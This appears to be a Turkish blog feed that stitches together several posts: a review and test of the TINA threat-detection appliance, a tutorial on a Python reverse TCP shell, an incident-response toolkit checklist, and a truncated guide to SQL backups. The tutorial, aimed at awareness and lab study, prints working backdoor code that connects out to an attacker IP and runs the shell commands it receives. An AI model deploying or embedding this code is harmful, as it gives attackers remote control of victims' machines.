Bu sorunun cevabını Konya ‘da bir etkinlikte TINA – Threat Intercepting Network Appliance sunumunu dinlediğim ISR Bilgi Güvenliği Kurucu Ortaklarından Hasan Emre YILMAZ verdi;

- Evet hepsini kullanıyorlar, ancak bu çözümler maalesef artık yetersiz. Siber saldırılar artık bilinen modellerini ve kaynaklarını sürekli değiştiriyorlar. Bildik saldırılar ve saldırı kaynakları çok yetersiz. Bilinmeyen kaynakların ve modellerin anlık olarak analiz edilmesi ve durdurulması gerekiyor. TINA ‘yı işte kapsamı tamamlamak için geliştirdik.

Sunumu dinledikten sonra bu makaleyi yazmaya karar verdim. Ezberlerimizden farklı bir ürün olduğu çok belliydi TINA ‘nın. Öncelikle üründen çok etkilendim. Rakiplerine baktığımda aslında bir elin parmaklarını geçmeyecek kadar azdı. Ve cesur bir girişim gerektiriyordu böyle bir ürün ile uğraşmak. Ve hikayesini araştırdım, Ulaştığım bilgiler şöyleydi,

TINA Security, ISR Bilgi Güvenliği tarafından %100 yerli olarak üretilen bir “Bilinen ve Bilinmeyen (Sıfır Gün -Zero Day) Saldırı Analiz ve Durdurma Sistemi.” ISR Bilgi Güvenliği TÜBİTAK Teknopark ‘ı olan MARTEK ‘de faaliyet gösteren siber güvenlik çözümleri geliştiren yerli sermayeli bir firma. Kurucuları Eren Ertem DEVELİ, Melih SARICA ve Hasan Emre YILMAZ. Butik bir anlayış ile sızma testleri, kaynak kod analizleri yapıyor ve global markalara yerelleştirme teknolojileri geliştiriyor. Rakiplerine baktığımda ciddi cesaret gerektirdiğini gördüm.

TINA “bizim” ürünümüz ve sıfırdan oturup Linux çekirdeği üzerine kod geliştirmek herkesin cesaret edemeyeceği bir durum. Notebook’umda bile Linux kullanan ben, bu durumu gördüğümde önce saygı duydum, sonrada hayranlık. J

Peki nedir bu TINA?

TINA, ülkemizde geliştirilen ilk ve tek appliance (Donanım bütünleşik) sıfır gün saldırı tespit sistemi olma özelliğini taşıyor. TINA ‘nın gözüme ilk çarpan özelliği açık kaynak kodlu bir uygulama üzerine geliştirilmemiş olması. Yani gerçekten %100 yerli. Hatta patent ‘e konu bir çok kendine özgü teknolojisi var. Mesela CAT (Central Attack Trap) özelliği ile dünyanın onlarca ülkesindeki tuzak sistemler ile siber saldırı istihbaratı topluyor, topladığı bu istihbaratı CTM (Central Threat Management) adı verilen bir teknoloji ile neredeyse anında, tüm kullanıcıları ile paylaşıyorlar. Sunum sırasında şu cümlede verilen örnek hayli ilginçti. “Şu an Amerika ‘da aktif olan ve ülkemizde hiç görülmeyen ransomware saldırı modellerini biliyoruz”

clip_image004

Sizin de farkettiğiniz gibi çok iddialı. Sunum bittikten sonre Emre hoca ile görüştüm. Bana bu konuda detay bilgilerde verdi. Şu anki referanslarından bahsetti. Bahsettiği kurumlar en az 250 kişiden başlıyordu. Yani iş yükü ne olursa olsun TINA bu işin altından başarıyla kalkabiliyordu. Ayrıca atak yakalama oranı oldukça yüksek. Kendine has donanımı üzerinde TINA DPI adı verilen bir yerel analiz sistemi var, TINA DPI port bağımsız HTTP ve DNS paketlerini inceleyerek tehdit ya da saldırı olasılıklarını değerlendiren sınıflandırma algoritmaları ile donatılmış bir teknoloji. Ayrıca donanım üzerine entegre edilmiş honeypot – bal küpü servisleri ile ağda yapılan şüpheli hareketleri gözlemleme / yakalama özellikleri bulunuyor.

clip_image006

Ve dahası, TINA ile birlikte entegre gelen bir Merkezi Sandbox teknolojisi (CSI – Central Sandbox Inspection) de var. Bu teknoloji ile donanım üzerinde incelenen ve daha detaylı incelenmesi gereken linkler ve dosyalar analiz edilerek, neredeyse “sıfır” false positive ile ve dünya markaları ile aynı maksimum değer olan 4 dakikada sonuçlandırıyor.

clip_image008

Kurulum gerektirmeyen TINA oldukça basit bir web arayüzüne sahip ve bu arayüzden yapılan atak bilgilerini görebiliyoruz. Kurulum firewall ile switch arasındaki kablonun arasına girmek kadar kolay ve kısa. Transparan çalıştığı için hiçbir ayar gerektirmiyor. Ortama dahil olur olmaz işe başlıyor.

clip_image010

TINA ‘nın etkili olduğu saldırı türlerindan bazıları şunlar,

               • Zero-Day (Daha önce bilinmeyen saldırılar)

               • Ağda yerleşik zararlı yazılım ve saldırganlara (APT)

               • Botnet saldırılarına

               • Trojanlar

               • Browser Hijackers

               • Ad-ware ‘ler

               • Fidye yazılımlarına (Ransomware’s)

               • Veri hırsızlığına (Data Exfiltration)

               • Güncel ve bilinen zararlı yazılım kaynaklarına

               • Ağınıza sızdırılan ShellCode ‘lara

               • Adli suçlara (DDOS kaynağı olmayı, veri hırsızlığı v.s.)

Ürün tam bir güvenlik pakedi aslında gözlemlediğim kadarıyla, sıfır gün saldırı tespit / zararlı yazılım analizi / honeypot ürünlerinin bir karışımı gibi. Ürünle ilgili anlatılacak çok fazla şey var. Bu makalemizde ürün açıklamasını gördük.

Bir sonraki makalemizde ürünü ara yüzleri ile inceleyeceğiz.

TINA – Threat Intercepting Network Appliance - Teknik İnceleme

$
0
0

Bir önceki makalemizde TINA ’nın genel çerçevelerinin ne olduğunu açıklayan bilgiler vermiştim. Yoğun iş hayatının sıkıcı temposundan biraz fırsat bulup daha detaylı incelemek için üretici olan ISR Bilgi Güvenliğinden bir demo ürün istedim, sağ olsunlar kırmadılar, hemen gönderdiler. Ürünlerinin denenmesini istiyorlar, özellikle yabancı rakipler ile kıyaslanması noktasında oldukça hevesliler. Hatta ürünlerine o kadar güveniyorlar ki, cihazın konumlandırılacağı yerlerde önce POC (Proof Of Consept) yapılmasını önemle tavsiye ediyorlar.

 

Test etmek için gönderilen ürün TINA ZP500 modeli. Oldukça şık bir kutu, rack ‘e takılabiliyor. Kurulum kılavuzu, kurulum videosu, yönetici kılavuzu hepsi eksiksiz dokümante edilmiş ve cihazın yanında sunuluyor.  Daha öncede blirttiğim gibi TINA ağınıza bridge olarak konumlanıyor. Firewall ile switch arasındaki kabloyu çıkarıp araya TINA ‘yı konumlandırıyorsunuz. Aşağıdaki şekildeki gibi.

 

clip_image002

IP adresi ve lisans bilgilerini girebileceğiniz bir CLI haricinde TINA ‘nın donanımı üzerinde bir yönetim paneli ya da benzeri bir panel yok.  TINA  ’nın tüm konfigürasyonu internette bulunan ve tüm diğer cihazlarında yönetim merkezi olan tehdit yönetim sistemi olan CTM (Central Threat Management) üzerinden gerçekleştiriliyor. Gelen cihazın CLI ‘ın görüntüsü aşağıdaki gibi karşımızda,

 

clip_image004

 

 

CLI üzerinde çok kısa bir kurulum ‘dan sonra CTM ‘e girip, donanımı aktive etmek gerekiyor. CTM görülmeye değer, çok temiz ve tasarlanmış, anlaşılır ve kargaşadan çok uzak yalın bir portal.

 

clip_image006

Ortalama 1 dakika içerisinde appliance ‘ı CTM ‘e tanımladıktan sonra donanım üzerinden 2 uyarı sesi geliyor. 1. ‘si lisans bilgileri doğru, internete bağlandım ve hazırım. 2. ise güncellemeleri aldım, artık aktifim. Böyle bir ürünün sesle iletişime geçmesi başka hiçbir üründe karşılaşmadığım ve hayli hoş bir durum J

 

TINA ortama dahil olmadan önce başlamış ve devam eden zararlı trafik varsa bunları da tespit edebiliyor. Nasıl mı? İçerden dışarı çkan trafiğide kontrol ederek.

Yukarıdaki ekran görüntüsünde göreceğiniz üzere ortama dahil olduktan sonra yaklaşık 1 saat içerisinde 29 farklı tehdit yakaladı ve onlarca sandbox analizi gerçekleştirdi. TINA ‘nın fabrika verilerine göre, ortalama 900- 950 mbps throughput değeri var. Paketleri  “on the fly” yakalıyor ve DPI teknolojileri sayesinde son derece hızlı karar verebiliyor. Elbette gerekli durumlarda sandbox analizlerini kullanıyor.

 

TINA ‘nın hoşuma giden bir yanı ise sandbox analizlerinde bir sayı limiti olmaması. TINA gerek gördüğü takdirde sandbox analizi yapan “karar verme” mekanizması var ve bunun için extra bir bedel talep etmiyor. Yeri gelmişken kısaca lisanslama modelinden bahsetmek istiyorum. TINA 100, 200, 300, 400, 500, 1000 şeklinde anlık kullanıcı sayısına göre lisanslanıyor ve üretici etik lisanslama modeline göre hareket ediyor. Buda bizi herhangi bir lisans aşımı durumunda kesintiye uğratmıyor.

 

TINA ‘nın tanımındaki “Bilinen ve Bilinmeyen Siber Saldırı Analiz ve Durdurma Sistemi” cümlesindeki “Bilinen” kısmını test etmeye karar verdim. Bilinmeyen taraftaki becerilerini  bir başka gün deneyeceğim.

 

Bilinen tehdit / saldırı olarak aklıma en riskli olan cryptolocker geliyor ve çok güncel olmadığını bildiğim cryptolocker alan adları ile basit bir kaç deneme yapıyorum. Yerel tuzaklar bu denemeleri anında yakalıyor.

 

clip_image008

 

Bu denemelerden sonra benim denemem olmayan, aslında ne olduğuna dair bir fikrim olmayan bir takım loglar düşmeye başladı TINA ‘ya:

 

clip_image010

 

TINA ‘daki Mühendis arkadaşlarla görüşüp bu durumu sordum, bunlar bilinen saldırı kaynakları idi ve ağdaki cihazlara bulaşmış malware, virüs, trojan v.b. zararlılar bunlar ile iletişime geçerek bir takım işler çeviriyorlardı, bunlara C&C – Command And Control Center deniliyor.

 

Bu aşamada en büyük rahatlık sorduğum soruları tam anlayan ve verdiği cevaplarla yüksek seviyede tatmin sağlayan yurdum insanı. J TINA bir Türk ürünü olduğundan Türkçe dertlerimi anlatabilmek inanılmaz mutluluk verici. LOG bile yollamama gerek kalmadan dilediğim herşeyi konuşabilme rahatlığı paha biçilmez.

 

Yukarıdaki log görüntüsünde gördüğünüz c1.popads.net, ad.juksr.com alan adları benim denemelerim değil.  Bunlar daha önce bu PC ‘lere bulaşan ve halihazırda aktive olmuş, neydüğü belirsiz, (tabi derin inceleme ile anlaşılabilir) zararlı kaynakları. Bayağı heyecanlandım bunları görünce, ağda bilgim harici cereyan eden bir takım faaliyetler bunlar.

 

Dashboard ‘un en dikkat çekici tarafı CSI.

 

Aşağıdaki ekran görüntüsündeki gibi yerel analizler ile (TINA DPI) daha derin analize girmesi gerektiği ortaya çıkan URL ‘lerin analizlerini buradan izleyebiliyorsunuz, sandbox analizlerinde sonucu temiz olanları aşağıdaki ekran görüntüsündeki gibi görüyorsunuz. Sandbox analizlerinden negatif sonuç çıkarma işini ve becerilerini daha bir sonraki makalede inceleyeceğim. Aşağıda CSI ile ilgili bir ekran görüntüsünü de paylaşmak istiyorum.

 

clip_image012

 

Bir sonraki makalede daha derin teknik detaylarla karşınızda olacağız.

Python Reverse TCP Shell

$
0
0

Bu yazımda sizlere python ile reverse TCP shell yönteminden ve bir malware’in sisteme bulaştığı zaman  saldırgana nasıl backdoor (arka kapı) açtığından bahsedip, kod bloğumuz içinde yer alacak  satırlarları açıklayacağım. Yazımızın sonunda ise farkındalık oluşturmak adına birkaç linux ve windows komutundan bahsedeceğim.

 

Günümüzde  gerek network katmanında gerekse host veya server katmanında dışarıdan gelebilecek bağlantılar için firewall’larda port kısıtlamaları son derece önem gösterilerek yapılmaktadır. Server üzerinde istenilmeyen servislerin aktif edilmeyerek socket açmaması, son kullanıcı bilgisayarlarına dışarıdan gelen tüm bağlantıların kapatılması, alınan önlemlerden bir kısmı diyebiliriz. Bunca güvenlik önlemi alınırken saldırganlarda boş durmadı ve biz sisteme sızamıyorsak onlar bizim ayağımıza gelsin” yöntemini geliştirdiler. Peki bu nasıl oluyor ? Bunun birçok yöntemi var, server sistemlerde kullanılan uygulamanın zaafiyeti olmasından kaynaklanan bir açıktan tutun bir malware’in sisteme bulaşmasına ve bu zararlı yazılımın saldırgana backdoor ile bağlanmasını sağlamaya kadar gidiyor.

 

clip_image001

 

Ve Saldırgan Socket Açarak Bekleyise Gecer

 

Nedir bu socket ?;  Network üzerinde çalışmasını istediğiniz bir uygulama veya servis olduğu zaman ethernet kartınızın ip adresi ile uygulamanın çalışması için verilen port bilgisi birleşir (socket ) ve bu ikili uygulamanıza gelecek istekleri karşılamak için dışarıya bağlantı açar. İnternet üzerinden bağlandığınız web sitelerini buna örnek gösterebiliriz. Browser’ınıza bir site adresi yazdığınızda www.cozumpark.com:80” diye çalışır. Siz her ne kadar 80” portunu görmesenizde(80 haricinde görürsünüz) çözümpark server’larına bu istek,  “ip:port” isteği olarak gider ve çözümpark server üzerinde çalışan IIS veya Apache socket’in karşılığı olan uygulamayı kullanıcıya döndürür (Server tarafında bu socket açıksa).

 

Görüldüğü üzere server-client mimarisi bir uygulama yazıyorsanız, python'da socket kütüphanesini kullanıyorsunuz. oluşturduğumuz fonksiyonu açıklarsak;

 

Socket=socket.socket()  ile  yeni bir socket oluşturduk

 

socket.AF_INET ile çağırarak IPv4  model bir socket olacağın

belirttik.

 

socket.SOCK_STREAM ile TCP temelli bir haberleşme olacağını belirttik(SOCK_DGRAM udp için)

 

Socket.bind((ip,port)) hatırlarsanız socket tanımını yaparken hep, ip:port ikilisi diye bahsetmiştik. İşte burada da oluşturduğumuz Socket'e ip:port bilgisini atadık ve çalıştığı makinada(saldırgan makina) interface'in IP ve hangi port adresini dinleyeceğini söyledik."0.0.0.0" yaparsanız üzerindeki tüm ip almış interface'leri dinler.

 

Socket.listen(1)  Aynı anda kaç bağlantıyı dinleyeceğini belirttik.

 

socketaddr,ipaddrr=Socket.accept()  oluşturduğumuz socket'e gelecek bağlantıları kabul etmek için accept()'i çağardık ve client tarafından açtığımız socket'e bağlantı geldiği  zaman size iki liste elemanı döndürür, karşı tarafla oluşan socket objesini ve bağlanan makinanın ipaddressi:port bilgisi

 

while döngüsünde, bağlantı oluştuğu zaman, raw_input() ile saldırgandan komut girmesini bekliyoruz. Girilen bu komutda "cikis" adli bir kelime geçiyorsa socket'i kapatmasını "socketaddr.close()"  yani bağlantıyı sonlandırmasını, geçmiyorsa da girilen komutu, oluşan  bağlantı socket'inde  "socketaddr.send(komut) " yardımı ile karşı tarafa göndermesini(malware yüklü makina).

 

print socketaddr.recv(1024) TCP bir bağlantı olduğu için gönderdiğimiz komuta karşılık gelen paketi'in 1 Mb lık değerini ekrana yazıyoruz.

 

baglanti() komutu ilede fonksiyonumuzu çağarıyoruz yani çalıştırıyoruz.

 

Gelelim şimdi malware yüklü veya client tarafına.

 

import socket

import subprocess

 

port=6161

ip="192.168.0.34"

def baglanti():

    Socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

    Socket.connect((ip,port))

 

    while True:

        komut = Socket.recv(1024)

 

        if 'cikis' in komut:

            Socket.close()

            break

        else:

            CMD=subprocess.Popen(komut, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)

            Socket.send(CMD.stdout.read())

            Socket.send(CMD.stderr.read())

           

           

 

baglanti()

 

Bir önceki komut dizinimizde detaylı olarak python'da socket oluşturmayı gösterdiğim için burada fazla detaya girmiyorum.

 

subprocess modülü alt işlemler oluşturmanıza (bir işlem çalışıyorken aynı anda başka bir işlemi alt işlem olarak çalıştırmanıza) ve bu işlemin sonucunda  dönen girdi/çıktı/hata  değerlerini yöneterek PIPE ile bağlamanızı sağlar.

 

Socket.connect((ip,port)) ile saldırgan makinamıza bağlanma talebi yolladık,

 

komut=Socket.recv(1024) bir önceki komut dizinimizde saldırganın raw_input ile gönderdiği komutu, komut adlı değişkenimize atıyoruz ve komut içinde cikis yazıyorsa(saldırgan bu komutu yollamıssa) socket'i sonlandırıyoruz(sürekli açık kalıp, bir sonraki aşamada socket kullanılıyor demesin diye).

 

 

CMD.subprocess.Popen(komut, shell= True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

kullanmamızın nedeni bir üst işlem ile aynı anda çalışacağını belirttik ve (komut) adlı değişkenimizi argüman olarak çağarıp, shell=True diyerek shell'i çağardık ve argümanımızı buraya yazdık. Normalde shell değerini injection ataklara karşı false yapmamızı önerirler ama bizim işimiz zaten bu :)

 

bir alt satırda yazan socket.send(CMD.stdout.read()) ve socket.send(CMD.stderr.read())  subprocess işleminde dönen çıktıyı ve hatayı okuyarak socket'e yani saldırgana yolluyoruz. Böylece saldırgan raw_input ile bir komut yolladığında, malware yüklü client makinamız bu komutu alıyor, subprocess ile shell'e yazıyor, dönen cevabı saldırgana açılan socket üzerinden yolluyor.

 

clip_image002

 

import socket #Socket oluşturmak için kullandığımız modül

 

port=6161 #Saldırganın dinleyeceği port adresi

ip="192.168.0.34" #Saldırgan'ın dış dünya ile bağlantısını sağlayan IP adresi

def baglanti():

    Socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

    Socket.bind((ip,port))

    Socket.listen(1)

 

    socketaddr,ipaddr= Socket.accept()

    print 'Baglanti gerceklesti',ipaddr

 

    while True:

        komut= raw_input("Shell> ")

        if 'cikis' in komut:

            socketaddr.send('cikis')

            socketaddr.close()

            break

        else:

            socketaddr.send(komut)

            print socketaddr.recv(1024)

baglanti()

 

Evet Gelelim bir ekran görüntüsü ile bu yazdığımızı açıklamaya. Benim test ortamımda(VirtualBox) Windows 7 (Malware yüklü client), bir de Kali linux yüklü saldırgan dediğim makinam var.

 

Şimdi tek yapmamız gereken Saldırgan makinada SocketServer.py scriptimizi çalıştıralım ve client tarafından malware'in çalışıtırıldığı zamanki durumu görelim.

 

clip_image003

 

Gördüğünüz gibi kurban makinamız malware'i çalıştırdı ve saldırgan makina reverse TCP shell alarak, windows üzerinde bulunduğu dizinde neler olduğunu görmen için "dir" komutunu çalıştırdı. " işlemlerini bitirdikten sonrada "cikis" komutu ile socket'i kapattı. Tabi bu yaptığım örnek sadece reverse TCP shell nedir ? sorusuna cevap niteliğinde basit client-server uygulamasıydı.  Günümüzde birçok malware analiz edildiği zaman "7777" portunu kullandığınıda dip not olarak eklemek isterim. Gelir bir de analiz aşamasında client makinada neler oluyor çok ufak ona bakalım.

 

netstat -naob (Admin yetkisi ile )komutunu çalıştırarak TCP veya UDP üzerinden bağlantı kurmuş makinaları görebilirsiniz. "o" parametresi size işlem id'yi, " b " parametresi ile o işlem id'ye karşılık gelen  ugulama adını gösterir.

 

clip_image005

 

 

Gördüğünüz gibi client makinamız saldırgan ip adresine "6161 " bağlantı kurmuş. Tabi bu sizin için anormal bir trafik olduğunu düşündürüp, birde bu uygulamanın hangi serisleri çalıştırdığına bakmanız ihtiyacını doğuruyor.

 

tasklist /svc ilede çalışan uygulamalara atanan servislerin listesini gösterir.

 

clip_image007

 

 

Malware kendini hiçbir servise bind etmemiş, tabi bizimki masum bir malware olduğu için bu böyle. Normalde siz bu işlem id'sini gördüğünüzde o işlemi sonlandıracağını tahmin ettiği için kendini başka bir servise bind eder ve daha detaylı bir analiz yapmanızı gerektirir.

Not: Bu işlem için saldırgan makinanız ile client aynı network'de değilse, saldırgan uygulamanız için modem veya firewall'dan NAT tanımlaması yapmanız gerekir

Evet arkadaşlar basit anlamda bu yazımızda Reverse TCP shell'i anlatmaya çalıştım. Umarım amaca hizmet edebilmişimdir. Bir sonraki yazımda yine python ile ilgili farklı bir konuyu ele alacağım.

 

Teşekkürler

 

Nedir Bu IR Identification – Detection - Analysis

$
0
0

Bu yazımda sizlere Incident handling ve response aşamasında elimizin altında olması gereken ve tabiri caizse vaktinde deprem dede diye tanımladığımız Ahmet Mete Işıkara (Allah rahmet etsin) hocamızın sürekli evimizin girişinde tutmamızı söylediği “Deprem Çantasından “, bilişim camiasının tabiri ile “Jump bag veya to go bag ” den ve içinde basit anlamda neler olması gerektiğinden bahsetmeye çalışacağım.

 

Unutulmaması gereken bir şey var ki bu yazıyı profesyonel dostlarım okurken “ Bu da olsa iyi olurdu” diyebilirsiniz çünkü bu bir ilk müdahale ve ilk analiz çantasıdır. Maksadımız kurumunuza bir zararlı yazılım bulaştığında veya bir olay olduğunda analiz edip, nereden geldiğini nasıl davrandığını ve buna karşı nasıl önlem almanız gerektiği konusunda size ışık tutması içindir. Bugün maalesef binlerce dolarlar harcayıp güvenlik sistemleri alınıyor ve yanlış bir konfigürasyondan dolayı  tutuğunuz köşeden gol yiyebiliyorsunuz. Bu çantanın da amacı, bu tür bir durumu analiz etmek için ilk aşamada dışarıdaki bir firmaya para vermeden kendi kaynaklarınız ile tespit etmektir. Olay adli bir sürece girdiği  veya kritik bir boyuta geldiği zaman bu çantamızdan ziyade bir Forensics analiz odasına ihtiyacınız olacaktır. Bu tür bir olayın şirketinizin başına yılda kaç defa geleceğini hesap ettiğinizde ve sürekli dinamik, yetkin bir uzman personel tutmanız gerektiğini unutmamak gerekirse, büyük boyuttaki adli vakaları dışarıdan hizmet almanız daha doğru olacaktır. Çantamızın içinde olması gereken temel anlamda yazılım veya ürünlere bakacak olursak;

Boş CD, DVD ve Writer: Analiz edeceğiniz malware’i v.b yazmak veya sistemin imajını almak için

 

İmaj Oluşturma Yazılımları

Burada dikkat edilmesi gereken bir konu varki bazen imaj alma dediğimizde konu yanlış anlaşılabiliyor. Acronis, Ghost v.b imaj alma yazılımları disk’e veri yazdığı ve orijinali ile oynayıp sıkıştırıp aldığı için bizim işimizi görmüyor. Bahsettiğim imaj  binary  dediğimiz şekilde alabilmeli ve diskin orijinal halini alabilmeli,

 

Linux ortamında  “ dd ” :

 

Linux distroları ile varsayılanda gelen bu şahane komut ile diskin raw imajını kolaylıkla alabilirsiniz.

 

Windows Ortamında “FTK imager”

 

Ücretsiz olan bu yazılım ile disk imaj alabileceğiniz gibi, memory imaj almadan tutun, silinen dosyaları recovery etmeye, dosyalara SHA1 MD5 hash oluşturmaya kadar işlem yapabilirsiniz. Portable versiyonu olması da ayrı bir güzel tarafı diyebiliriz.

 

clip_image001

Forensic Software

 

Sleuth Kit : Linux ve Windows ortamında CLI üzerinden kullanabileceğiniz ücretsiz dijital forensics yazılımı

 

Autopsy: Sleuth Kit için front end bir yazılım olarak düşünebilirsiniz. Timeline Analysis, Hash Filtering, File System Analysis ve Keyword Searching gibi ekstra özellikleri mevcut.

 

EnCase, X-Ways gibi ücretli yazılımlarla tabi ki daha fazla analizler yapabilir, adli bilişim anlamında geçerlilik sağlayabilirsiniz fakat dediğim gibi bizim amacımız ilk analiz olduğu için yaklaşık 1000 $ ile 7000$ arasında paraları bu yazılımlara harcamak işimize gelmiyor.

 

Investigative Tools

Biraz önce bazı forensic araçlarından bahsetsem de günümüzde artık bunlar modifiye edilmiş, linux-unix base işletim sistemlerinin içine gömülü bir şekilde geliyor. Bunlara verilebilecek en güzel örneklerden biride SANS institute’nin “ Investigative Forensics Toolkit (SIFT)”  dir . Başlıca içersini de (VM imajları mevcuttur.)

-Sleuth Kit :  Digital forensics için kullanabilirsiniz

- Log2timeLine : farklı log dosyalarındaki  timestep’leri script yazmakla uğraşmadan basit bir şekilde extract etmenizi sağlayan framework’dür. Glog2timeline GUI versiyonudur.

Wireshark: Network üstünde sniff edilmiş paketleri analiz edebileceğiniz bir tool’dur

 

Volatility : Memory image’ları analiz edebilirisiniz.

 

- Ssdeep ve md5deep : hash kontrolü yapabileceğiniz tool'lardır.

bkz:

 

http://digital-forensics.sans.org/community/downloads

http://www.caine-live.net/page5/page5.html

http://www.oxygen-forensic.com/en/

http://www.deftlinux.net/download/

 

Ethernet Tap(Terminal Access Point):

 

Nedir bu TAP  : Passive network dinleme cihazı diyebiliriz ve konumlandırıldığı networkde  üzerinden geçen bütün trafiği analiz edeceğiniz makinaya realtime olarak atar. Network’den anlayan arkadaşlar peki SPAN port’da aynı işi yapıyor neden TAP alalım diyebilir. Bu yüzden biraz farklarından bahsetmekte fayda var.

clip_image003

 

Tabi ki TAP cihazının dezavantajlarıda var, pahalı olması, switch başka bir IP adresine trafiğin kopyasını yollayabilirken (uzaktan yönetebilir) TAP sadece üzerinden geçen trafiği monitor  portuna yollayabilir.  Özet olarak detaylı bir analiz yapmak isterseniz TAP gerekiyor aksi halde SPAN port’da işinizi görecektir.

 

Laptop:  Çantada mutlaka olmazsa olmazıdır. Analiz için kendi makinanızı değil bu makinayı kullanmanız gerekiyor. Bahsettiğimiz forensics yazılımlarının iso’larını veya live cd’lerini bu makinada açabilirsiniz.

 

Patch Kablo: Bildiğimiz Cross-Over kablosu fakat kaliteli olmasına dikkat edin.

 

Console Kablosu : Fw, switch, IPS v.b cihazlara bağlanabilmek için (USB dönüştürücüyü unutmayalım)

 

Solid State Drives(SSD):  Büyük miktardaki dataları hızlı bir şekilde analiz etmek için çantamızda mutlaka bulundurmalıyız.

 

RAM: Bazı durumlarda extra ram’e ihtiyaç duyulabilir.

 

Telefon Rehberi: Olaylara müdahale aşamasında başınızda birçok kişi olabiliyor ve o an arayacağınız destek almanız gereken kişileri unutabiliyorsunuz. Bu tür durumlara karşı bir telefon rehberi olmasında fayda var ve bu rehberi isim sırasına göre değil olay sırasına göre sıralamanız, hangi durumda kimleri aramanız gerektiğini daha net ortaya koyar.

 

Anti-statik plastik kutu: Taşıyacağınız elektronik aygıtın zarar static elektrikten zarar görmemesi için.

 

Incident Response Formu: Olay için alacağınız kayıt, yani 5 W (Who, What, When, Where, Why) ve How   sorularının cevabını yazacağınız form.

 

Not Defteri:Çalışma esnasında alacağınız kayıtlar

 

Kamera : Sorduğunuz soruları ve yaptığınız müdahaleyi kayıt altında tutmak, daha sonraki analiz hatta Lesson Learned aşamasında işinize yarayacaktır.

 

El Feneri, Tornavida, RJ-45 connector, Kalem, Cımbız, Hareket edebilen ufak ayna

Temel anlamda çantamızda olması gereken bunlar diyebiliriz. Tabi ki bunları arttırmak bizim elimizde. Benim burada yazdıklarım sadece çanta içinde olması gerekenlerdi.  Çantanız ne kadar donanımlı olursa olsun, olay müdahale aşamasında en önemli etken, “ Takım olmaktır “ Incident Response ve Incident Handling team’leri bir kurumun vazgeçilmezidir. Bu team önceden belli olmalıdır ki olay anında herkes görevini otomatik olarak yapabilmeli.

 

Incident Response Team

 

Malware Forensics & Network Forensics Specialist : Olaya müdahale edecek uzman

Network Admin (Sistem ile ilgili  log ve monitoring gibi kayıtları verebilmesi, troubleshooting )

Network Admin (Network ile ilgili log ve  monitoring gibi kayıtları verebilmesi, troubleshooting  )

HR (Personel farkındalığı oryantasyonları düzenlemek ve koordinasyon)

Disaster Recovery & Backup ( Olası bir durumda geri dönüş senaryosunu gerçekleştirmek için)

HelpDesk (Müdahale zamanına kadar geçen süreci yönetmeli, son kullanıcının alacağı aksiyonları kontrol altında tutmalı )

Preparation dediğimiz yani testi kırılmadan önceki en önemli aşamalardan biride mutlaka eğitim. Kurumlar personellerini Phishing ataklarına ve fake call ataklarına karşı sürekli güncel tutmaları gerekiyor. Phisme, sptoolkit v.b oltalama  araçları  ile kendi  personellerinize saldırı yaparak onların böyle bir tuzağa düştüğünde ne gibi sonuçları doğuracağını anlatabilir, hatta bütçe varsa belirli çizgi filmler ile desteklenmelidir.  Olaylara müdehale ekibinin dinamizminin ayakta tutabilmek içinse belirli aralıklarda şirket içi CTF (Capture The Flag) düzenlenmelidir. Bir sonraki yazımda Preparation aşamasını örneklerle açıklayacağım. Bu yazımızın amacını pek dağıtmamak konu bütünlüğü için daha doğru olacaktır.

Zaman ayırıp okuduğunuz için teşekkürler.


Güvenlik Tehditlerine Karşı Doğru Savunma- Yedek

$
0
0

Daha önce çeşitli platformlarda ve kendi bloğumda, güvenlik tehditlerine karşı windows seviyesinde korunma ve risk azaltma faktörlerini ele almış, çeşitli önerilerde bulunmuştum.
Bu yazımda ise, daha çok küçük ve orta ölçekli firmalar için ilgili tehditlerden %100 korunmayı amaç edinmeyi ele alacağız.

Bildiğiniz gibi daha önce yazılarımda mevcut güvenlik riskleri için hiçbir yazılımsal çözümün %100 korumayacağını, böyle bir iddianın yalnızca sağlıklı ve güvenli yedek almaktan geçtiğini izah etmiştim.
Bu kapsamda, ev kullanıcılarının, küçük ve orta ölçekli firmaların kullanabileceği, birkaç yedekleme metoduna değinmek istiyorum.

Küçük ve Orta Ölçekli Firmalar İçin Uygulama Tabanlı Yedek Alma :
SQL YEDEKLEME:
Artık ölçeğine bakılmaksızın hemen hemen tüm firmalar bir otomasyon yazılımı kullanmaktalar. Hem yerli olarak üretilen, hem de yabancı kaynaklı otomasyon yazılımlarının pazarı da giderek artmakta. Bu yazılım çeşitliliğinin ortak özelliği genellikle SQL tabanlı olmalarıdır.
Büyük ölçekli firmalar; SQL yedekliliğini sağlamak için Cluster gibi Always On gibi çeşitli kümeleme, canlı tutma teknolojilerini ve hatta coğrafi felaketten kurtarma senaryoları kullandığından, bu yazımızın hedef kitlesi değiller.

Orta ve küçük ölçekli firmalar için yukardaki teknolojiler çoğu kez yatırım limitlerini aştığı için tercih edilmez. Hal böyle olunca, kendileri için sağlıklı ve güvenli yedek almak hayati önem kazanıyor.
Bu yazının konusu da bu.
Sql verilerini ve dosyaların yedeği güvenli ortama nasıl alınır?

Şimdi 2 farklı açık kaynak yazılımdan bahsedeceğim.
SQL FTP ve Cobian Backup

Öncelikle ;
SQL FTP : Yazılmı şu adresten indirebilirsiniz
Tıklayınız

Yukarıdaki iki yazılımın temel özelliği servis bazlı çalışıyor olmaları.
Yani eğer bir yedekleme prosedürü başlatır ve zamanlarsanız, yeniden başlatmanıza gerek kalmadan, zamanı geldiğinde iş başlar, ta ki hedef alanda alan sıkıntısı yaşanana kadar.

Sql Ftp kurulduğunda şöyle bir ekranla karşılaşırız.


clip_image002

Eğer uygulamayı sql'de yetkili bir kullanıcı olarak başlatmış isek, sol tarafta db'ler sıralanır. Gelmemiş ise, connect sql tuşuna basıp, yetkili bir kullanıcı seçebilirsiniz. Free sürümde maksimum 2 adet veritabanı seçebilirsiniz. Yedeklemek istediğiniz veritabanını seçip,
Store backups is selected destinations alanına geçiyoruz.

clip_image004

Görüleceği üzere, birçok hedefe yedek alabilirsiniz.
Bunlardan en önemlileri ve benim tavsiyem uzak hedefe yedek almanızdır.
( google drive gibi )
Google drive, free olarak size 10 GB alan tahsis eder. Eğer veritabanı boyutu bu miktarı aşmıyorsa, otomatik silmeye ayarlayarak her gün gdrive'a sql yedeği alabilirsiniz.

